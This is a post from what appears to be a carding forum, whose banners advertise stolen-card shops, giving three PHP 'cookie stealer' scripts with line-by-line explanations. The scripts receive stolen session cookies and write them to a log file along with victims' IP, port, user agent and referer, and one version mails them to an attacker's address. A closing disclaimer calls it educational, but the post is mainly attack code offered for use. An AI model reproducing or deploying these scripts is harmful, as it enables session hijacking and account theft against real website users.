Welcome!

By registering with us, you'll be able to discuss, share and private message with other members of our community.

SignUp Now!
banner Expire 25 April 2025
adv ex on 22 February 2024
Kfc Club

Patrick Stash
banner expire at 13 August 2024
BidenCash Shop
banner Expire 10 May 2025
Money Club cc shop
Luki Crown
Wizard's shop 2.0
Trump cc shop
Blackstash cc shop
Yale lodge shop
UniCvv
banner Expire 1 April 2021

How to create cookie stealer Coding in PHP?~ get via email

P

Premiums

TRUSTED VENDOR
Joined
Dec 5, 2020
Messages
2,725
Here is the simple Cookie Stealer code:
Cookie stored in File:


<?php
$cookie = $HTTP_GET_VARS[“cookie”];
$steal = fopen(“cookiefile.txt”, “a”);
fwrite($steal, $cookie .”\n”);
fclose($steal);
?>
Click to expand...
$cookie = $HTTP_GET_VARS[“cookie”]; steal the cookie from the current url(stealer.php?cookie=x)and store the cookies in $cookie variable.

$steal = fopen(“cookiefile.txt”, “a”); This open the cookiefile in append mode so that we can append the stolen cookie.

fwrite($steal, $cookie .”\n”); This will store the stolen cookie inside the file.

fclose($steal); close the opened file.

Another version: Sends cookies to the hacker mail

<?php
$cookie = $HTTP_GET_VARS[“cookie”]; mail(“[email protected]”, “Stolen Cookies”, $cookie);
?>
Click to expand...
The above code will mail the cookies to hacker mail using the PHP() mail function with subject “Stolen cookies”.


Third Version

<?php
function GetIP()
{
if (getenv(“HTTP_CLIENT_IP”) && strcasecmp(getenv(“HTTP_CLIENT_IP”), “unknown”))
$ip = getenv(“HTTP_CLIENT_IP”);
else if (getenv(“HTTP_X_FORWARDED_FOR”) && strcasecmp(getenv(“HTTP_X_FORWARDED_FOR”), “unknown”))
$ip = getenv(“HTTP_X_FORWARDED_FOR”);
else if (getenv(“REMOTE_ADDR”) && strcasecmp(getenv(“REMOTE_ADDR”), “unknown”))
$ip = getenv(“REMOTE_ADDR”);
else if (isset($_SERVER[‘REMOTE_ADDR’]) && $_SERVER[‘REMOTE_ADDR’] && strcasecmp($_SERVER[‘REMOTE_ADDR’], “unknown”))
$ip = $_SERVER[‘REMOTE_ADDR’];
else
$ip = “unknown”;
return($ip);
}
function logData()
{
$ipLog=”log.txt”;
$cookie = $_SERVER[‘QUERY_STRING’];
$register_globals = (bool) ini_get(‘register_gobals’);
if ($register_globals) $ip = getenv(‘REMOTE_ADDR’);
else $ip = GetIP();
$rem_port = $_SERVER[‘REMOTE_PORT’];
$user_agent = $_SERVER[‘HTTP_USER_AGENT’];
$rqst_method = $_SERVER[‘METHOD’];
$rem_host = $_SERVER[‘REMOTE_HOST’];
$referer = $_SERVER[‘HTTP_REFERER’];
$date=date (“l dS of F Y h:i:s A”);
$log=fopen(“$ipLog”, “a+”);
if (preg_match(“/bhtmb/i”, $ipLog) || preg_match(“/bhtmlb/i”, $ipLog))
fputs($log, “IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>”);
else
fputs($log, “IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie nn”);
fclose($log);
}
logData();
?>
Click to expand...
The above Cookie stealer will store the following information:

  • Ip address
  • port number
  • host(usually computer-name)
  • user agent
  • cookie


This Article is for Educational purpose only, written for Ethical Hackers. This article is for creating public awareness about the Internet Risks.
 
You must log in or register to reply here.

Online statistics

Members online
265
Guests online
744
Total visitors
1,009
Totals may include hidden visitors.

Latest posts

Newest members

Stay Connected

Top Bottom